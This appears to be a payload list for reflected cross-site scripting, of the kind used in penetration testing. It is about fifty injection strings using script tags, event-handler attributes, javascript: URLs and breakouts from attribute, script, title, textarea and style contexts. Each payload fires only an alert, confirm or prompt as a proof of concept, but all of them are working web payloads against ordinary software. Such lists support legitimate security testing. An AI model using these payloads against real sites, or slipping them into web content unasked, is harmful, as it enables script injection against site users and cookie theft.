# XSS - Reflected Payloads
# Covers HTML context, attribute context, JS context, URL context
# Standard tags and event handlers
<script>alert(1)</script>
<script>alert('XSS')</script>
<script>alert(document.domain)</script>
<script>alert(document.cookie)</script>
<script>alert(String.fromCharCode(88,83,83))</script>
<script>confirm(1)</script>
<script>prompt(1)</script>
<img src=x onerror=alert(1)>
<img src=x onerror=alert('XSS')>
<img/src=x onerror=alert(1)>
<img src=x onerror="alert(1)">
<svg onload=alert(1)>
<svg/onload=alert(1)>
<svg onload=alert('XSS')>
<body onload=alert(1)>
<input onfocus=alert(1) autofocus>
<input onblur=alert(1) autofocus><input autofocus>
<marquee onstart=alert(1)>
<details open ontoggle=alert(1)>
<details/open/ontoggle=alert(1)>
<video src=x onerror=alert(1)>
<audio src=x onerror=alert(1)>
<iframe src="javascript:alert(1)">
<iframe onload=alert(1)>
<object data="javascript:alert(1)">
<embed src="javascript:alert(1)">
<select onfocus=alert(1) autofocus>
<textarea onfocus=alert(1) autofocus>
<keygen onfocus=alert(1) autofocus>
<isindex action=javascript:alert(1) type=image>
"><script>alert(1)</script>
'><script>alert(1)</script>
"><img src=x onerror=alert(1)>
'><img src=x onerror=alert(1)>
"><svg onload=alert(1)>
</script><script>alert(1)</script>
</title><script>alert(1)</script>
</textarea><script>alert(1)</script>
</style><script>alert(1)</script>
'-alert(1)-'
"-alert(1)-"
javascript:alert(1)
javascript:alert(document.domain)
<a href="javascript:alert(1)">click</a>
<a href="javascript:alert(1)">
<div onmouseover=alert(1)>hover me</div>
<p onmouseover=alert(1)>hover</p>
<b onmouseover=alert(1)>hover</b>
